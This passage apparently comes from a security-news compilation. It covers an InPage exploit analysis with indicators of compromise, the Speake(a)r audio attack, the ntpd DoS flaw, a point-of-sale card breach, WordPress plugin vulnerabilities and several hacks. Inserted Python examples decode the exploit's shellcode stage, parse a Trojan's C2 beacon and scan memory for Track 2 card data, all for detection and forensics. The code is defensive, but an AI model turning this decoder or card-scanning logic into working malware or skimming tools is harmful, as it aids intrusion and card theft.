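The egg hunt and the NOT/XOR decoder described above, re-implemented host-side as an added example for this analysis (it is not Kaspersky's code or the attackers' shellcode). Only the egg pattern 68 72 68 72 and the NOT followed by XOR 0xAC transform come from the write-up; the memory image, the plaintext stage and its length are constructed for the example, and the `hunt_egg`, `decode_stage` and `recover_stage` names are hypothetical. One useful consequence of re-deriving the transform: NOT is XOR 0xFF, so the two-step decoder collapses to a single XOR 0x53, which is the form to use when writing a scanner rule for the encoded stage.

```python
"""Re-implement the InPage exploit's egg hunt and second-stage decoder.

Added example for this analysis; not Kaspersky's code or the attackers'
shellcode. Facts from the write-up: the egg is 68 72 68 72, the decoder
applies an arithmetic NOT followed by XOR 0xAC. The memory image, the
plaintext stage and its length are constructed. The real decoder locates
itself with FLDPI/FSTENV (an FPU GetPC trick); a host-side re-implementation
has no need for that.
"""

EGG = bytes.fromhex("68726872")


def decode_stage(blob: bytes) -> bytes:
    """NOT, then XOR 0xAC, byte by byte. Because NOT == XOR 0xFF the pair
    is equivalent to a single XOR 0x53."""
    return bytes(((~b) & 0xFF) ^ 0xAC for b in blob)


def encode_stage(plain: bytes) -> bytes:
    """Inverse transform; used here only to build the constructed sample."""
    return bytes((b ^ 0xAC) ^ 0xFF for b in plain)


def hunt_egg(memory: bytes, start: int = 0) -> int:
    """Linear scan for the egg; returns the offset just past it, or -1.
    A real in-process egg hunter must probe pages safely (a syscall that
    tolerates bad pointers) rather than read one contiguous buffer."""
    idx = memory.find(EGG, start)
    return -1 if idx < 0 else idx + len(EGG)


def recover_stage(memory: bytes, stage_len: int) -> bytes:
    """Egg hunt, then decode the stage_len bytes that follow the egg."""
    off = hunt_egg(memory)
    if off < 0:
        raise ValueError("egg not found in memory image")
    return decode_stage(memory[off:off + stage_len])


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """NUL-separated printable ASCII strings: the quick way to see which
    APIs and URLs a decoded stage references."""
    out = []
    for chunk in blob.split(b"\x00"):
        if len(chunk) >= min_len and all(0x20 <= c < 0x7F for c in chunk):
            out.append(chunk.decode("ascii"))
    return out


# Constructed memory image (not a dump): padding, the egg, the encoded stage,
# more padding. The API names mirror what the write-up says the stage uses;
# the URL is a placeholder on a reserved TLD.
STAGE_PLAIN = b"InternetReadFile\x00WinExec\x00http://example.invalid/a.exe\x00"
SAMPLE_MEMORY = (b"\x90" * 64 + b"\x00" * 200 + EGG
                 + encode_stage(STAGE_PLAIN) + b"\xcc" * 32)


if __name__ == "__main__":
    stage = recover_stage(SAMPLE_MEMORY, len(STAGE_PLAIN))
    print("egg found at offset", hunt_egg(SAMPLE_MEMORY) - len(EGG))
    print("strings in decoded stage:", extract_strings(stage))
```

Run it against a process memory dump (or the document itself, since the encoded stage lives in the file) by replacing `SAMPLE_MEMORY` with the bytes read from disk; the stage length must come from the shellcode under analysis rather than from the constant used here.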

The final payload is a Trojan written in Visual Basic 6. It defines a hook using the SetWindowsHook() function with the WH_MSGFILTER parameter. It communicates with its C2 server at on port 8080.

During the initial session the C2 server sends “Pass” and the host replies with “Auth<username>@<hostname>\#/<OS version>\#/<IP address>\#/-”. In addition to b4invite[.]com, this same Trojan was also spread with a configuration pointing at the C2 server relaybg[.]com.
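The handshake above is structured enough to detect on the wire. The following is an added detection example, not Kaspersky's code: it checks that the server's first message is exactly "Pass" and that the host's reply is a well-formed Auth beacon with the three `\#/`-separated fields and the trailing `-`. The sample payloads are constructed; the function names are hypothetical.

```python
"""Detect the VB6 Trojan's C2 handshake: "Pass" from the server, then
"Auth<username>@<hostname>\\#/<OS version>\\#/<IP address>\\#/-" from the host.

Added detection example; not Kaspersky's code. Sample payloads are constructed.
"""
SEP = b"\\#/"   # the literal three-byte separator \#/


def parse_auth_beacon(payload: bytes):
    """Return the beacon fields as a dict, or None if payload is not one.
    The trailing "-" and the "@" in the first field are checked so that
    unrelated data starting with "Auth" (an HTTP Authorization header, say)
    is not mistaken for the beacon."""
    if not payload.startswith(b"Auth"):
        return None
    parts = payload[4:].split(SEP)
    if len(parts) != 4 or parts[3] != b"-" or b"@" not in parts[0]:
        return None
    user, host = parts[0].split(b"@", 1)

    def dec(b: bytes) -> str:
        return b.decode("utf-8", errors="replace")

    return {"user": dec(user), "host": dec(host), "os": dec(parts[1]), "ip": dec(parts[2])}


def is_c2_handshake(server_to_client: bytes, client_to_server: bytes) -> bool:
    """True when the server's first message is exactly "Pass" and the client
    answers with a well-formed Auth beacon."""
    return server_to_client == b"Pass" and parse_auth_beacon(client_to_server) is not None


# Constructed sample session (not a capture).
SAMPLE_SERVER_HELLO = b"Pass"
SAMPLE_AUTH = b"Authjdoe@WS-FIN-07\\#/Windows 7 SP1\\#/10.0.12.34\\#/-"

if __name__ == "__main__":
    print(is_c2_handshake(SAMPLE_SERVER_HELLO, SAMPLE_AUTH))
    print(parse_auth_beacon(SAMPLE_AUTH))
```

Feed it the first payload in each direction of a TCP session to port 8080; the parsed fields also give you the victim's username, hostname and internal IP for triage.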


So far, victims of these attacks have been observed in Myanmar, Sri Lanka and Uganda, in both the financial and the governmental sector.


By all appearances, this newly discovered exploit has been in the wild for several years. In some ways it reminds us of the exploits for Hangul Word Processor, another language/region-specific text processing suite, used almost exclusively in South Korea, which has been plagued by several exploits used by various threat groups to attack Korean interests.

Despite our attempts, we have not been able to get in touch with the InPage developers. By comparison, the Hangul developers have been consistently patching vulnerabilities and publishing new versions that fix these problems. The best defense against exploits is always a multi-layered approach to security. Make sure you have an internet security suite capable of catching exploits generically, such as Kaspersky Internet Security. Installing the Microsoft EMET tool can also help, as can running the most recent version of Windows (10). Finally, default-deny policies, also known as whitelisting, can mitigate many such attacks.

The Australian Signals Directorate's Top 35 list of mitigation strategies shows that at least 85% of intrusions could have been mitigated by following the top four strategies together: application whitelisting, updating applications, updating operating systems and restricting administrative privileges. Kaspersky Lab has technological solutions covering the first three of these (i.e. all the technology-based strategies) as well as most of the others in the ASD Top 35 list.

Kaspersky Lab detects this exploit as HEUR:Exploit.Win32.Generic.

More information about this exploit, associated campaigns and attacks is available to customers of Kaspersky Intelligence Services. Contact:

Indicators of compromise:


f00e20ec50545106dc012b5f077954ae – rtf
729194d71ed65dd1fe9462c212c32159 – inp

C&Cs used in the samples dropped by the weaponized InPage documents:

Aliasway[.]com <- SINKHOLED by Kaspersky Lab

Your Headphones Can Spy On You — Even If You Have Disabled Microphone
24.11.2016 thehackernews Hacking
Have you considered the possibility that someone could be watching you through your webcam? Or listening to all your conversations through your laptop’s microphone?
Even a bit of thought about this possibility could make you feel incredibly creeped out.
But most people think that they have a solution to these major issues i.e. simply covering their laptop’s webcam and microphone with tape, just like Facebook CEO Mark Zuckerberg and FBI Director James Comey.
But it's 2016, and a piece of tape won't help you: a new experiment has shown how easily hackers can turn your headphones into a microphone and spy on your conversations in the background without your knowledge.
A group of Israeli security researchers at Ben Gurion University have created proof-of-concept code (malware) that converts typical headphones into microphones and then uses them to record all conversations in the room, just like a fully-featured bugging device.
Speake(a)r Malware Weaponizes Headphones and Speakers
Using headphones as microphones is a decade-old technique. There are many videos available on YouTube, which show that earbuds can function as microphones in a pinch.
But what the researchers managed to do is switch an output channel of the audio card on your laptop, running either Windows or Mac OS, into an input and then record sound without any dedicated microphone channel from as far as 20 feet away.
Dubbed "Speake(a)r," the malicious code is disturbingly able to hijack a computer to record audio even when its microphone is disabled or completely disconnected from the computer.
"People don’t think about this privacy vulnerability," lead researcher Mordechai Guri told Wired. "Even if you remove your computer’s microphone, if you use headphones you can be recorded."
Speake(a)r actually uses the existing headphones to capture vibrations in the air: the headphone diaphragms convert them into weak electrical signals, and the malware alters the configuration of the audio jacks, retasking an output jack (used for speakers and headphones) as an input jack (used by microphones).
This allows a hacker to record audio, though at lower quality, from computers with a disabled microphone or none at all, or from the computer of a paranoid user who has intentionally removed any existing audio components.
But What made this Hack Possible?
Thanks to a little-known feature of Realtek audio codec chips that silently "retasks" the computer's output channel as an input channel.

This makes it possible for the researchers' malware to record audio even when the earbuds are connected to an output-only jack and have no microphone channel on their plug.
What's even worse? Since Realtek chips are used in the majority of systems these days, the Speake(a)r attack works on practically any desktop or laptop running Windows or macOS, leaving most computers vulnerable to such attacks.
"This is the real vulnerability," said Guri. "It’s what makes almost every computer today vulnerable to this type of attack."
This feature of Realtek audio codec chips is truly dangerous, as it cannot be easily fixed. The only way to deal with the issue is to redesign and replace the chip in current as well as future computers, which is impractical.
The researchers also published a YouTube video showing the Speake(a)r eavesdropping attack at work.
For more detailed and technical explanation of the Speake(a)r attack, you can head on to the research paper [PDF] titled "Speake(a)r: Turn Speakers to Microphones for Fun and Profit."
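The retasking both Speake(a)r articles on this page describe leaves a visible trace on Linux hosts with an Intel HDA codec: the kernel exposes each codec's pin widgets under /proc/asound/cardN/codec#M, and a playback jack that has been flipped to input shows an IN bit in its pin-control register. The script below is an added example written for this page, not the Ben Gurion researchers' code or tool; it parses that dump format and flags any pin whose default role is HP Out, Line Out or Speaker but whose input path is enabled. The codec dump embedded in it is constructed (node 0x1b, the retasked jack, is hypothetical), and the function names are assumptions.

```python
"""Spot retasked audio jacks on a Linux host with an Intel HDA codec.

Added example for the two Speake(a)r articles above; not the researchers'
code. Parses the ALSA codec dump format under /proc/asound/cardN/codec#M and
flags pins whose default role is playback but whose pin-control register has
the input path enabled. The dump below is constructed; node 0x1b is the
hypothetical retasked jack.
"""
import glob
import re

# Pin widget control bits (Intel HDA specification, as decoded by ALSA).
PINCTL_HP_EN = 0x80
PINCTL_OUT_EN = 0x40
PINCTL_IN_EN = 0x20

PLAYBACK_DEVICES = {"Line Out", "Speaker", "HP Out"}

NODE_RE = re.compile(r"^Node (0x[0-9a-f]+) \[([^\]]+)\]")
DEFAULT_RE = re.compile(r"^\s*Pin Default 0x[0-9a-f]+: \[(\w+)\] (.+?) at ")
CTLS_RE = re.compile(r"^\s*Pin-ctls: (0x[0-9a-f]+):")

SAMPLE_CODEC_DUMP = """\
Codec: Realtek ALC269VB
Address: 0
Node 0x02 [Audio Output] wcaps 0x41d: Stereo Amp-Out
  Amp-Out caps: ofs=0x57, nsteps=0x57, stepsize=0x02, mute=0
Node 0x18 [Pin Complex] wcaps 0x40048b: Stereo Amp-In
  Pincap 0x00003734: IN Detect
  Pin Default 0x01a19020: [Jack] Mic at Ext Rear
  Pin-ctls: 0x24: IN VREF_80
Node 0x14 [Pin Complex] wcaps 0x40058d: Stereo Amp-Out
  Pincap 0x00010014: OUT EAPD Detect
  Pin Default 0x99130110: [Fixed] Speaker at Int N/A
  Pin-ctls: 0x40: OUT
Node 0x21 [Pin Complex] wcaps 0x40048f: Stereo Amp-In Amp-Out
  Pincap 0x0000373c: IN OUT HP Detect
  Pin Default 0x0221401f: [Jack] HP Out at Ext Front
  Pin-ctls: 0xc0: OUT HP
Node 0x1b [Pin Complex] wcaps 0x40048f: Stereo Amp-In Amp-Out
  Pincap 0x0000373c: IN OUT HP Detect
  Pin Default 0x0121401f: [Jack] HP Out at Ext Rear
  Pin-ctls: 0x24: IN VREF_80
"""


def parse_pins(dump: str) -> list:
    """One record per Pin Complex node: id, jack kind, device role, pin-ctl value."""
    pins, current = [], None
    for line in dump.splitlines():
        m = NODE_RE.match(line)
        if m:
            current = None                      # any other widget type ends the pin
            if m.group(2) == "Pin Complex":
                current = {"node": m.group(1), "conn": None, "device": None, "ctls": None}
                pins.append(current)
            continue
        if current is None:
            continue
        m = DEFAULT_RE.match(line)
        if m:
            current["conn"], current["device"] = m.group(1), m.group(2)
            continue
        m = CTLS_RE.match(line)
        if m:
            current["ctls"] = int(m.group(1), 16)
    return pins


def find_retasked_pins(dump: str) -> list:
    """(node, device) for every playback pin whose input path is enabled."""
    hits = []
    for pin in parse_pins(dump):
        if pin["device"] in PLAYBACK_DEVICES and pin["ctls"] is not None:
            if pin["ctls"] & PINCTL_IN_EN:
                hits.append((pin["node"], pin["device"]))
    return hits


def scan_live_codecs() -> dict:
    """Read every codec dump on the running host; empty on non-HDA systems."""
    results = {}
    for path in sorted(glob.glob("/proc/asound/card*/codec#*")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            results[path] = find_retasked_pins(fh.read())
    return results


if __name__ == "__main__":
    print("sample dump:", find_retasked_pins(SAMPLE_CODEC_DUMP))
    for path, hits in scan_live_codecs().items():
        print(path, hits or "clean")
```

This is detection, not a fix: a one-off scan shows the jack state at that moment only, so an attacker who retasks a jack just while recording would need to be caught by periodic polling, and the underlying capability remains in the codec, as the researchers point out.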

Watch out! This iPhone-freezing video will CRASH any iPhone!
24.11.2016 securityaffairs Apple

It has happened again: most Apple devices crash when the owner plays this iPhone-freezing video. Be careful when clicking on suspicious links.
A new iOS bug is threatening Apple users: most Apple devices crash when the owner plays a particular video. The iPhone-freezing video is circulating online; when users play it in the Safari browser, the iPhone slows down until it stops working altogether.

The iPhone-freezing video was first discovered by EverythingApplePro; it is a short .mp4 clip of someone standing by a bed with the word “Honey” written across the screen.

“After playing the clip, affected iPhones will remain usable for a couple of minutes before growing more sluggish and eventually crashing altogether. ” reads a post published by The Telegraph.


At the time of writing there is no information regarding the nature of the bug. Users observed that the iPhone crashes even if only a part of the video is played.

The clip crashes every version of iOS back to iOS 5. The experts noticed different behaviour only on iOS 10.2 beta 3, where playing the video causes the phone to display the spinning wheel that indicates it is powering off.
In the past, other similar bugs were able to crash or restart Apple devices: receiving a certain text message, changing an iPhone setting, or simply clicking on a link could crash an iPhone, iPad or even a Mac.

Below the PoC video for the iPhone-freezing video:

While waiting for a patch for your iPhone, be careful when clicking on suspicious or unsolicited links.
If you have played the video by mistake and your iPhone freezes up, you can solve the problem with a hard reboot.
“To do this on any iPhone model other than the iPhone 7, press and hold the home and power buttons at the same time for at least 10 seconds until the Apple logo appears. On an iPhone 7 you can hard reset by holding the power and volume decrease buttons.” continues The Telegraph.

“After the Apple logo appears, release the buttons and your iPhone should restart normally.”

Registral Function of the State Mexico (FREM) hacked. Shad0wS3C is back

23.11.2016 securityaffairs Hacking

The hacker group Shad0wS3C is back: it hacked the Institute of the Registral Function of the State of Mexico (FREM) and leaked its database.
Shad0wS3C is back, having hacked the Institute of the Registral Function of the State of Mexico (FREM) and leaked a dump of its database.

The hacker leaked the database at the following URL


The archive includes three files containing users' personal information, including passport details and other sensitive data.

In the past Shad0wS3C was a hacktivist group; it now seems to have changed its mission and started hacking without any specific political motivation.

Its member Gh0s7 told me that the FREM data breach is just a preview of future attacks.

“This leak is just a simple demonstration for our future attacks. We will be leaking more gov and private corps.” Gh0s7 told me.

The group launched a targeted attack, the first of a new wave aimed at government servers and corporations worldwide.

The hackers have a list of government and private servers to hack, which they call their “black list.”

The hackers did not reveal details of the data breach; they simply told me they had used a “private exploit.”

The most recent previous hack by Shad0wS3C was the Paraguay Secretary of National Emergency (SNE) data breach in August; in that case, too, the hackers leaked online a dump from a PostgreSQL database.

Tropic Trooper APT targets Taiwanese Government and companies in the energy sector
23.11.2016 securityaffairs APT

The Tropic Trooper APT continues to target Asia, this time Taiwanese government organizations and companies in the energy sector.
The Tropic Trooper APT has been active since at least 2012; it was first spotted last year by security experts at Trend Micro when it targeted government ministries and heavy industries in Taiwan and the military in the Philippines.

Now researchers from Palo Alto Networks report that the group targeted the secretary general of Taiwan's Executive Yuan and a fossil fuel provider with a strain of malware called Yahoyah. The attackers leverage an exploit for the CVE-2012-0158 vulnerability, the same flaw exploited by many other APT groups, including Lotus Blossom, NetTraveler and the Four Element Sword APT.

Palo Alto Networks also discovered that the group used Poison Ivy in its campaigns, something Trend Micro's analysis had only speculated about.

“The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware, but the other attack deployed the widely available Poison Ivy RAT.” state the report published by Palo Alto Networks. “This confirms the actors are using Poison Ivy as part of their toolkit, something speculated in the original Trend Micro report but not confirmed by them. Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family, which has not been previously tied to the group.”

The hackers launched a spear-phishing campaign to trick victims into opening specially crafted decoy documents. The Excel file sent to the Executive Yuan purports to come from a staff member of the Democratic Progressive Party and deals with political issues.

Tropic Trooper APT targets Taiwanese Government

After infecting the target machine, the malware displays a clean document containing the content of interest to the victim.

“All of the text uses Traditional Chinese, in contrast to Simplified Chinese, which is the official written language of the People’s Republic of China. Traditional Chinese is used in Taiwan, Hong Kong, Macau, and many overseas Chinese communities. The overarching theme of the spreadsheet is documenting protestor activity and/or progressive reform attempts in progress across Taiwan and the tone of the spreadsheet suggests it was compiled by progressive supporters.” continues the report.

If you are interested in more information on the Tropic Trooper APT, including IoCs for its malware, take a look at the report.

NTP DoS Exploit Released — Update Your Servers to Patch 10 Flaws
23.11.2016 thehackernews Attack

A proof-of-concept (PoC) exploit for a critical vulnerability in the Network Time Protocol daemon (ntpd) has been publicly released that could allow anyone to crash a server with just a single maliciously crafted packet.
The vulnerability has been patched by the Network Time Foundation with the release of NTP 4.2.8p9, which includes a total of 40 security patches, bug fixes, and improvements.
The NTP daemon is used in almost every device that needs to synchronize its clock. NTP got the most attention in late 2013 and 2014, when attackers used it to launch highly amplified DDoS attacks against online services.
The flaw, which affects ntpd versions prior to 4.2.8p9 but not ntp-4.3.94, was discovered by security researcher Magnus Stubman, who privately disclosed it to the Network Time Foundation on June 24.
A patch for the vulnerability was developed and sent to Stubman on 29 September; just two days later the researcher confirmed that it mitigated the issue, and he has now gone public with the disclosure.
"The vulnerability allows unauthenticated users to crash ntpd with a single malformed UDP packet, which causes a null pointer dereference," Stubman wrote in an advisory published Monday.
Stubman also released a PoC exploit that can crash the NTP daemon and creates a denial-of-service (DoS) condition. The issue only affects Windows.
Besides Stubman's high-severity vulnerability, the latest NTP update also addresses two medium-severity bugs, two medium-/low-severity and five low-severity security issues, 28 bug fixes, and other improvements over 4.2.8p8.
Another major bug is a trap-crash vulnerability reported by Cisco's Matthew Van Gundy.
"If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service," reads the advisory.
The CERT Coordination Center at Carnegie Mellon University's Software Engineering Institute has also published the full list of the NTP vulnerabilities and their fixes, together with a list of vendors whose products implement NTP and may be affected.
Since an exploit for the bug is now public, administrators are strongly advised to patch their NTP installations as soon as possible. Where an immediate upgrade is not possible, restricting who may send status queries to the daemon (the noquery flag on ntp.conf restrict lines) limits exposure to unauthenticated remote triggers.
In the past, attackers have abused NTP servers by sending small spoofed UDP packets that make the server send a large response (megabytes of traffic) to the DDoS target's IP address.
An NTP amplification attack exceeding 400 Gbps was carried out against content-delivery and anti-DDoS protection firm CloudFlare, and volumetric DDoS attacks exceeding 100 Gbps hit popular gaming services, including League of Legends and services run by Blizzard, in 2014.
In a study published in late 2013, Arbor Networks illustrated how effective NTP amplification attacks are: massive and efficient enough to take any large server offline, because the reflecting server returns roughly 1,000 times the size of the initial query to the target.
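Both halves of this story come down to the same two questions for an operator: is the ntpd build older than 4.2.8p9, and does ntp.conf still let arbitrary remote hosts send control/monitor queries (the same surface monlist amplification relied on)? The following check is an added example written for this page, not code from the NTP project or the advisory; the banner string and ntp.conf fragment are constructed sample input, and the version-comparison rule (fixed from 4.2.8p9, or 4.3.94 on the development branch) is taken from the release notes quoted above.

```python
import re

# Added example (not from the NTP project): check whether an ntpd build
# predates the 4.2.8p9 fixes and whether ntp.conf still allows unauthenticated
# control/monitor queries from arbitrary sources.

_VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

def parse_ntp_version(banner):
    """Pull a version tuple out of an `ntpd --version` banner.
    'ntpd 4.2.8p8@1.3265-o ...' -> (4, 2, 8, 8); a missing pN suffix counts as p0."""
    m = _VER_RE.search(banner)
    if not m:
        raise ValueError("no ntpd version found in %r" % banner)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def is_fixed(version):
    """True when the release already carries the 4.2.8p9 fixes; the 4.3.x
    development branch carries them from 4.3.94 on."""
    if version[:2] == (4, 3):
        return version >= (4, 3, 94, 0)
    return version >= (4, 2, 8, 9)

def weak_restrict_lines(ntp_conf):
    """Return 'restrict' lines that leave mode 6/7 queries open to remote hosts.
    Without 'noquery' (or 'ignore') a matching source may send control and
    monitor queries, which is what monlist-based amplification relied on.
    Loopback entries are skipped because local ntpq needs them."""
    weak = []
    for raw in ntp_conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("restrict"):
            continue
        tokens = line.split()[1:]
        if "noquery" in tokens or "ignore" in tokens:
            continue
        if "127.0.0.1" in tokens or "::1" in tokens:
            continue
        weak.append(line)
    return weak

def audit(banner, ntp_conf):
    """Summarise both checks for one host."""
    version = parse_ntp_version(banner)
    return {
        "version": version,
        "needs_upgrade": not is_fixed(version),
        "weak_restrict": weak_restrict_lines(ntp_conf),
    }

# Constructed sample input for this example.
SAMPLE_BANNER = "ntpd 4.2.8p8@1.3265-o Tue Jun  7 10:12:49 UTC 2016 (1)"
SAMPLE_CONF = """\
driftfile /var/lib/ntp/ntp.drift
restrict default kod nomodify notrap nopeer noquery   # good
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict -6 ::1
restrict 192.168.1.0 mask 255.255.255.0 nomodify notrap  # queries still open
"""

if __name__ == "__main__":
    print(audit(SAMPLE_BANNER, SAMPLE_CONF))
```

Run against the real host by feeding it the output of `ntpd --version` and the contents of /etc/ntp.conf; the version check is the one that matters for the crash bug, the restrict check is defence in depth and also closes the amplification vector.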

Credit cards stolen from Madison Square Garden venues in the last year
23.11.2016 thehackernews Crime

Madison Square Garden Company informed users that their payment card data may have been stolen by cybercriminals
Yesterday, the Madison Square Garden Company notified customers that their payment card data may have been stolen by cybercriminals. According to the company, the crooks installed point-of-sale (PoS) malware on its payment processing system and harvested card data used at Madison Square Garden venues over the past year.

Hackers have stolen payment card data, including credit card numbers, cardholder names, expiration dates, and internal verification codes.

In disclosing the breach, the Madison Square Garden Company clarified that only customers who physically used their card for food, drink or merchandise purchases at its venues were affected. According to the organization, online ticket and merchandise purchases did not expose customers.

MSG disclosed neither details of how the attack was carried out nor the number of affected users.

The affected cards were used between 9 November 2015 and 24 October 2016 at several MSG venues, including Madison Square Garden itself, the Theater at Madison Square Garden, Radio City Music Hall, Beacon Theater and the Chicago Theater.


Below is the official statement released by the Madison Square Garden Company.

“Findings from the investigation show external unauthorised access to MSG’s payment processing system and the installation of a program that looked for payment card data as that data was being routed through the system for authorisation,” reads the statement.

“Data contained in the magnetic stripe on the back of payment cards swiped in person to purchase merchandise and food and beverage items at Madison Square Garden, the Theater at Madison Square Garden, Radio City Music Hall, Beacon Theater, and Chicago Theater between November 9, 2015 and October 24, 2016 may have been affected, including credit card numbers, cardholder names, expiration dates and internal verification codes. Not all cards used during this time frame were affected. This incident did not involve cards used on MSG websites, at the venues’ Box Offices, or on Ticketmaster.”
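The statement describes a classic RAM scraper: a program that watches for magnetic-stripe data as it passes through the payment system in clear text, before it is sent for authorisation. When responding to such an incident, examiners run the same kind of pattern search over memory dumps of the PoS processes to establish what could have been harvested. The scanner below is an added example written for this page (not MSG's code and not the attackers' malware); the memory buffer is a constructed sample containing a well-known test card number and a decoy digit run that fails the Luhn check.

```python
import re

# Added example (not MSG's or the attackers' code): scan a memory image for
# Track 2 payment card data, the way a forensic examiner checks what a
# RAM-scraping PoS implant could have harvested. Track 2 is laid out as
# ;PAN=YYMMSSS<discretionary>?  with a 13-19 digit PAN, YYMM expiry and a
# three-digit service code.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")

def luhn_ok(pan):
    """Luhn mod-10 check; filters out digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def mask_pan(pan):
    """Keep BIN and last four so the report does not itself leak card data."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]

def find_track2(buf):
    """Return masked hits for every Luhn-valid Track 2 record in `buf`."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        mm = int(m.group(3).decode("ascii"))
        if not luhn_ok(pan) or not 1 <= mm <= 12:
            continue
        hits.append({
            "offset": m.start(),
            "pan": mask_pan(pan),
            "expiry": "%02d/%s" % (mm, m.group(2).decode("ascii")),
            "service_code": m.group(4).decode("ascii"),
        })
    return hits

# Constructed sample buffer: a well-known test PAN plus a decoy that fails Luhn.
SAMPLE_DUMP = (
    b"\x00\x00auth-req\x00;4111111111111111=1812101000000000000?\x00\x00"
    b"junk;1234567890123=2001101?\x00"
)

if __name__ == "__main__":
    for hit in find_track2(SAMPLE_DUMP):
        print(hit)
```

The Luhn filter is what keeps the false-positive rate tolerable on a multi-gigabyte dump; the offsets tell you which process, and which code path, was holding unencrypted track data, which is exactly the exposure point-to-point encryption is meant to remove.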

WordPress Plugins could expose online shoppers on Black Friday and Cyber Monday

23.11.2016 securityaffairs Security

With Black Friday and Cyber Monday upon us, Checkmarx has published a report analyzing the security of some of the top WordPress e-commerce plugins.
Black Friday and Cyber Monday are upon us, and security experts from Checkmarx are questioning the security of some of the top WordPress e-commerce plugins, which are currently used on more than 100,000 commercial websites.

Checkmarx analyzed the top 12 WordPress e-commerce plugins discovering that four of them are affected by severe vulnerabilities, including reflected cross-site scripting, SQL injection, and file manipulation flaws.

“Out of the 12 plugins we are scanning we have detected high-risk vulnerabilities in at least four of them. One plugin contained three vulnerabilities while the other three each contained one. Of the found vulnerabilities so far, Reflected XSS was found on three plugins, an SQL injection was found on one plugin, Second Order SQL Injection found on one plugin with File Manipulation also being detected on one plugin.” reported the analysis published by Checkmarx. “Of the vulnerabilities that we have detected so far, if they were exploited, the users of over 135,000 websites could find their personal data threatened by malicious parties or cyber criminals.”

The document explains the most common flaws affecting WordPress-based websites, such as reflected cross-site scripting, SQL injection and file manipulation.

The report does not name the vulnerable e-commerce plugins, nor does it identify the commercial sites using them.

Businesses powering e-commerce platform based on WordPress should download plugins only from trusted sources (

The researchers also suggest scanning plugin source code with a static source code analysis solution to discover whether it is affected by the above classes of vulnerability.

Patch management is crucial for securing e-commerce websites running on the WordPress CMS: administrators have to keep plugins constantly up to date.
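To make the static-analysis suggestion concrete, here is a deliberately small line-level check for two of the bug classes the report names, reflected XSS and SQL injection, run over PHP source held in a string. It is an added example written for this page, not Checkmarx's scanner or any real plugin's code; the plugin fragment is constructed and hypothetical, and the list of sanitizer names is a small subset of the WordPress escaping API.

```python
import re

# Added example (not Checkmarx's tool): flag PHP lines where a request
# superglobal reaches an output sink or a $wpdb SQL sink on the same line
# without passing through a WordPress sanitizer or $wpdb->prepare().
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[")
XSS_SINKS = re.compile(r"\b(echo|print|printf)\b|<\?=")
SQL_SINKS = re.compile(r"\$wpdb->(query|get_results|get_var|get_row|get_col)\s*\(")
SANITIZERS = re.compile(
    r"\b(esc_html|esc_attr|esc_url|esc_js|intval|absint|sanitize_text_field|"
    r"wp_kses|wp_kses_post)\s*\(|\$wpdb->prepare\s*\("
)

def scan_php(source):
    """Return (line number, class, line text) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if not SOURCES.search(line) or SANITIZERS.search(line):
            continue
        if XSS_SINKS.search(line):
            findings.append((lineno, "reflected-xss", line.strip()))
        if SQL_SINKS.search(line):
            findings.append((lineno, "sql-injection", line.strip()))
    return findings

# Constructed sample plugin fragment (hypothetical code, not a real plugin).
SAMPLE_PLUGIN = """<?php
$q = $_GET['q'];
echo 'Results for ' . $_GET['q'];
echo 'Results for ' . esc_html($_GET['q']);
$wpdb->query("DELETE FROM orders WHERE id = " . $_POST['id']);
$wpdb->query($wpdb->prepare("DELETE FROM orders WHERE id = %d", $_POST['id']));
"""

if __name__ == "__main__":
    for lineno, kind, text in scan_php(SAMPLE_PLUGIN):
        print("line %d: %s: %s" % (lineno, kind, text))
```

Lines 3 and 5 of the sample are flagged; lines 4 and 6 pass because the input goes through esc_html() and $wpdb->prepare(). Line 2 shows the limit of a same-line heuristic: the value is stored in $q and could be echoed or queried later, which is the shape of the "second order" injection the report mentions, and catching that needs data-flow tracking across lines and files. Treat a check like this as a triage filter, not a substitute for a real SAST tool.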

The report also offers useful suggestions for Cyber Monday and Black Friday shoppers, such as:

Use strong passwords.
Never reuse a password on more than one site or platform.
Enable two-factor authentication.
Check the validity of the SSL certificate presented by the e-commerce platform.
Be aware of phishing emails.

Armed Forces recruitment website hacked, visitors redirected to China
23.11.2016 securityaffairs Hacking

The Canadian Armed Forces recruitment website was taken down after it was hacked; would-be recruits were being redirected to a Chinese government page.
The Canadian Armed Forces recruitment website was hacked last week; visitors were redirected to the Chinese government's main page instead of the legitimate site.

According to CTV television, anyone trying to sign up for Canada's Armed Forces on the page was redirected to the Chinese site instead. The armed forces quickly took down the page.

“The recruiting web page for the Canadian Armed Forces appears to have been hacked Thursday, redirecting users to an official Chinese state page.” reported CBC News.

“Users visiting, which is the main landing page for would-be recruits, were instead getting a page full of information and statements about Chinese government ministers, and their activities, in that country. The site now shows an error message instead”

The Canadian Armed Forces promptly took the recruiting page offline.


Two government sources told CBC News that the recruiting website was hosted externally by a private-sector provider.

One of the officials who spoke with the media outlet said that servers at the Department of National Defence were not compromised in the attack.

“This is a serious matter,” Public Safety Minister Ralph Goodale told reporters Thursday after question period. “We don’t want to jump to conclusions, but when something of this nature happens … we treat it with real gravity, and we’ll investigate it. That process is underway right now.”

The hack was confirmed by Defence ministry spokeswoman Ashley Lemire, who added that there is no information yet on who was responsible.

Canadian authorities have long complained about incursions of foreign hackers into government computer networks.

